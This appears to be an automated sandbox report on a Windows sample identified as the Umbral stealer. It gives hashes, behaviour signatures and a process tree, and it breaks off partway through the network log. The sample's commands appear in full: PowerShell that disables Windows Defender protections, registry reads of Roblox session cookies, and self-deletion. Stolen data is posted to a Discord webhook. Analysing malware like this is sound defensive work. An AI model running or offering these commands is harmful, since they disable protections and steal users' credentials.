Analysis

  • max time kernel
    138s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 21:58

General

  • Target

    NursultanRealese.exe

  • Size

    245KB

  • MD5

    cd46141c0f7707d1b4be3187a4c922cd

  • SHA1

    36ff990729059807dd86027fb11a5ba26609588c

  • SHA256

    ec3e59d47b01bb3c53ec23cb06829a302e9c6385a7898460138249de6f0cd4b6

  • SHA512

    61f82d754268476ece6e2b83e71494f32feecee37366542fbfa533a57c8aeb2b8f00ce4bcc30ca4730594eafe0ae8e0aca5660009f6d40a1b05895a4cb385c27

  • SSDEEP

    6144:dloZM+rIkd8g+EtXHkv/iD4ZHPtxd58e1my+Jizq6:/oZtL+EP8R1xznhz

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe
    "C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe"
      2⤵
      • Views/modifies file attributes
      PID:3640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3940
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4828
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2544
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:4968
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:4600
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1352
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:1684
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\NursultanRealese.exe" && pause
          2⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          PID:860
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:3556
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        1⤵
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3992
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0xf4,0x130,0x7ffa1c30cc40,0x7ffa1c30cc4c,0x7ffa1c30cc58
          2⤵
            PID:4556
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1832,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1828 /prefetch:2
            2⤵
              PID:4216
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:3
              2⤵
                PID:2768
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2480 /prefetch:8
                2⤵
                  PID:4404
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
                  2⤵
                    PID:3588
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
                    2⤵
                      PID:4036
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3752,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
                      2⤵
                        PID:264
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:8
                        2⤵
                          PID:3560
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
                          2⤵
                            PID:3028
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4928,i,7749069080460046502,16103358690336558114,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2220
                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                          1⤵
                            PID:4192
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                            1⤵
                              PID:216
                            • C:\Windows\system32\backgroundTaskHost.exe
                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                              1⤵
                                PID:1352

                              Network

                              • flag-us
                                DNS
                                gstatic.com
                                NursultanRealese.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                gstatic.com
                                IN A
                                Response
                                gstatic.com
                                IN A
                                142.250.179.227
                              • flag-gb
                                GET
                                https://gstatic.com/generate_204
                                NursultanRealese.exe
                                Remote address:
                                142.250.179.227:443
                                Request
                                GET /generate_204 HTTP/1.1
                                Host: gstatic.com
                                Connection: Keep-Alive
                                Response
                                HTTP/1.1 204 No Content
                                Content-Length: 0
                                Cross-Origin-Resource-Policy: cross-origin
                                Date: Thu, 28 Nov 2024 21:58:33 GMT
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              • flag-us
                                DNS
                                ip-api.com
                                NursultanRealese.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                ip-api.com
                                IN A
                                Response
                                ip-api.com
                                IN A
                                208.95.112.1
                              • flag-us
                                GET
                                http://ip-api.com/line/?fields=hosting
                                NursultanRealese.exe
                                Remote address:
                                208.95.112.1:80
                                Request
                                GET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                Response
                                HTTP/1.1 200 OK
                                Date: Thu, 28 Nov 2024 21:58:33 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 6
                                Access-Control-Allow-Origin: *
                                X-Ttl: 7
                                X-Rl: 43
                              • flag-us
                                DNS
                                58.55.71.13.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                58.55.71.13.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                227.179.250.142.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                227.179.250.142.in-addr.arpa
                                IN PTR
                                Response
                                227.179.250.142.in-addr.arpa
                                IN PTR
                                lhr25s31-in-f31e100net
                              • flag-us
                                DNS
                                72.32.126.40.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                72.32.126.40.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                95.221.229.192.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                95.221.229.192.in-addr.arpa
                                IN PTR
                                Response
                              • flag-us
                                DNS
                                88.210.23.2.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                88.210.23.2.in-addr.arpa
                                IN PTR
                                Response
                                88.210.23.2.in-addr.arpa
                                IN PTR
                                a2-23-210-88deploystaticakamaitechnologiescom
                              • flag-us
                                DNS
                                1.112.95.208.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                1.112.95.208.in-addr.arpa
                                IN PTR
                                Response
                                1.112.95.208.in-addr.arpa
                                IN PTR
                                ip-apicom
                              • flag-us
                                DNS
                                www.google.com
                                chrome.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                www.google.com
                                IN A
                                Response
                                www.google.com
                                IN A
                                172.217.16.228
                              • flag-gb
                                GET
                                https://www.google.com/async/ddljson?async=ntp:2
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /async/ddljson?async=ntp:2 HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: none
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                                Response
                                HTTP/2.0 429
                                date: Thu, 28 Nov 2024 21:58:35 GMT
                                pragma: no-cache
                                expires: Fri, 01 Jan 1990 00:00:00 GMT
                                cache-control: no-store, no-cache, must-revalidate
                                content-type: text/html
                                server: HTTP server (unknown)
                                content-length: 3153
                                content-type: text/html
                                content-length: 3153
                              • flag-gb
                                GET
                                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                host: www.google.com
                                x-client-data: CMnmygE=
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/async/newtab_promos
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /async/newtab_promos HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIrPo7oGIjAlucUIA4wT3cFrxiYaY30ReocY9NWnDLwwQEZs229iU7U4lvc_DD_cRlDn-pF6kJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGIrPo7oGIjAlucUIA4wT3cFrxiYaY30ReocY9NWnDLwwQEZs229iU7U4lvc_DD_cRlDn-pF6kJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: none
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIrPo7oGIjDdJWIccIdWYw-DIYE9e3-V9Pz-WYsczSaImjbBJHz_oyqkNBytSdytI8czfyKFVCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGIrPo7oGIjDdJWIccIdWYw-DIYE9e3-V9Pz-WYsczSaImjbBJHz_oyqkNBytSdytI8czfyKFVCkyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                host: www.google.com
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-gb
                                GET
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGIrPo7oGIjC8gdgq-9tmI7y7Pgy2pPdki6wmQH7Lccg00jC-Oxe_znegoFX__NxQtf8qAK-iZ-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                chrome.exe
                                Remote address:
                                172.217.16.228:443
                                Request
                                GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS117BTGIrPo7oGIjC8gdgq-9tmI7y7Pgy2pPdki6wmQH7Lccg00jC-Oxe_znegoFX__NxQtf8qAK-iZ-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                host: www.google.com
                                x-client-data: CMnmygE=
                                sec-fetch-site: cross-site
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                              • flag-us
                                DNS
                                74.204.58.216.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                74.204.58.216.in-addr.arpa
                                IN PTR
                                Response
                                74.204.58.216.in-addr.arpa
                                IN PTR
                                lhr48s49-in-f101e100net
                                74.204.58.216.in-addr.arpa
                                IN PTR
                                lhr25s13-in-f10�H
                                74.204.58.216.in-addr.arpa
                                IN PTR
                                lhr25s13-in-f74�H
                              • flag-us
                                DNS
                                35.200.250.142.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                35.200.250.142.in-addr.arpa
                                IN PTR
                                Response
                                35.200.250.142.in-addr.arpa
                                IN PTR
                                lhr48s30-in-f31e100net
                              • flag-us
                                DNS
                                228.16.217.172.in-addr.arpa
                                Remote address:
                                8.8.8.8:53
                                Request
                                228.16.217.172.in-addr.arpa
                                IN PTR
                                Response
                                228.16.217.172.in-addr.arpa
                                IN PTR
                                mad08s04-in-f41e100net
                                228.16.217.172.in-addr.arpa
                                IN PTR
                                lhr48s28-in-f4�H
                              • flag-us
                                GET
                                http://ip-api.com/json/?fields=225545
                                NursultanRealese.exe
                                Remote address:
                                208.95.112.1:80
                                Request
                                GET /json/?fields=225545 HTTP/1.1
                                Host: ip-api.com
                                Response
                                HTTP/1.1 200 OK
                                Date: Thu, 28 Nov 2024 21:58:36 GMT
                                Content-Type: application/json; charset=utf-8
                                Content-Length: 163
                                Access-Control-Allow-Origin: *
                                X-Ttl: 29
                                X-Rl: 43
                              • flag-us
                                DNS
                                discord.com
                                NursultanRealese.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                discord.com
                                IN A
                                Response
                                discord.com
                                IN A
                                162.159.136.232
                                discord.com
                                IN A
                                162.159.135.232
                                discord.com
                                IN A
                                162.159.138.232
                                discord.com
                                IN A
                                162.159.128.233
                                discord.com
                                IN A
                                162.159.137.232
                              • flag-us
                                POST
                                https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G
                                NursultanRealese.exe
                                Remote address:
                                162.159.136.232:443
                                Request
                                POST /api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G HTTP/1.1
                                Accept: application/json
                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                Content-Type: application/json; charset=utf-8
                                Host: discord.com
                                Content-Length: 941
                                Expect: 100-continue
                                Connection: Keep-Alive
                                Response
                                HTTP/1.1 204 No Content
                                Date: Thu, 28 Nov 2024 21:58:38 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: keep-alive
                                Set-Cookie: __dcfduid=ec75da78add311efb31326ed731c1150; Expires=Tue, 27-Nov-2029 21:58:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                x-ratelimit-limit: 5
                                x-ratelimit-remaining: 4
                                x-ratelimit-reset: 1732831118
                                x-ratelimit-reset-after: 1
                                via: 1.1 google
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MeMpVrVclk5%2BCZ7TTRdwalSwn796GmtPwj4p8Hkj5bYx%2FyAISDnstTociJMRxEcMLq1OC6Hi6zfpkuqNiyzldEDhRvayKmvse%2F00RVJgwEx4kpTpH4eSZG9Q%2FG66"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                X-Content-Type-Options: nosniff
                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                Set-Cookie: __sdcfduid=ec75da78add311efb31326ed731c1150b96222c1f7d8da739f212460751b8c372a3c6103d328a82d186ada49712b8ef4; Expires=Tue, 27-Nov-2029 21:58:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                Set-Cookie: __cfruid=0bdb9b21f8b7f597670acf41fe0da38099d8bd58-1732831118; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                Set-Cookie: _cfuvid=5R8j4HueGWWMOGNWj1qZKSm3XweFg8OD2l5n3U.08YE-1732831118908-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                Server: cloudflare
                                CF-RAY: 8e9d9ed37b416367-LHR
                              • flag-us
                                POST
                                https://discord.com/api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G
                                NursultanRealese.exe
                                Remote address:
                                162.159.136.232:443
                                Request
                                POST /api/webhooks/1301312698985746583/K1fGKcUXfYQcRHyvEdGJsIJ-5P6lyoAfZOWMo_iC0DqlTxrw3f19gxORH3lqzeMsJT4G HTTP/1.1
                                Accept: application/json
                                User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                Content-Type: multipart/form-data; boundary="922da92f-c09f-40c1-8a8e-aec394bb04e4"
                                Host: discord.com
                                Cookie: __dcfduid=ec75da78add311efb31326ed731c1150; __sdcfduid=ec75da78add311efb31326ed731c1150b96222c1f7d8da739f212460751b8c372a3c6103d328a82d186ada49712b8ef4; __cfruid=0bdb9b21f8b7f597670acf41fe0da38099d8bd58-1732831118; _cfuvid=5R8j4HueGWWMOGNWj1qZKSm3XweFg8OD2l5n3U.08YE-1732831118908-0.0.1.1-604800000
                                Content-Length: 39957
                                Expect: 100-continue
                                Response
                                HTTP/1.1 200 OK
                                Date: Thu, 28 Nov 2024 21:58:39 GMT
                                Content-Type: application/json
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                x-ratelimit-limit: 5
                                x-ratelimit-remaining: 4
                                x-ratelimit-reset: 1732831120
                                x-ratelimit-reset-after: 1
                                vary: Accept-Encoding
                                via: 1.1 google
                                alt-svc: h3=":443"; ma=86400
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3a1w621I9ezJjNdcdd3cGTdtaj7xbOorNwQhbb41k08KREPDmMEgky8%2B%2Fu6KvPZ4u5iqhAW5D6L1az6UeRu%2FP2SLyZ%2FGDPcrRj2ciyfEWfiRN1eMinDVTHFdnNzh"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                X-Content-Type-Options: nosniff
                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                Server: cloudflare
                                CF-RAY: 8e9d9edd88706367-LHR
                              • flag-us
                                DNS
                                clients2.google.com
                                chrome.exe
                                Remote address:
                                8.8.8.8:53
                                Request
                                clients2.google.com
                                IN A
                                Response
                                clients2.google.com
                                IN CNAME
                                clients.l.google.com
                                clients.l.google.com
                                IN A
                                142.250.178.14
                              • flag-gb
                                GET
                                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D52%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D52%2526e%253D1
                                chrome.exe
                                Remote address:
                                142.250.178.14:443
                                Request
                                GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D52%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D52%2526e%253D1 HTTP/2.0
                                host: clients2.google.com
                                sec-fetch-site: none
                                sec-fetch-mode: no-cors
                                sec-fetch-dest: empty
                                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                accept-encoding: gzip, deflate, br, zstd
                                accept-language: en-US,en;q=0.9
                                cookie: __Secure-ENID=22.SE=Bn1Uj9Rd24j5OYsGSYUYdQI5VDkfBnpifkUcXVUoyffQQrxVS6ssufRUCL_SrWR3YPWnl0YKOBfB3a0LzHgJhqjtbDA7GgIRtqQHk1I14ZiHmQsTPlnH4V5ShoilyC6G6R5C_dshhYDEAcct9nUAd44LZ2bVhz2Q9gJCS0Q7ZU_apZqYfwl7riRFFIhhgRvpFuE
                              • flag-us
                                DNS
                                232.136.159.162.in-addr.arpa
                                Remote address:
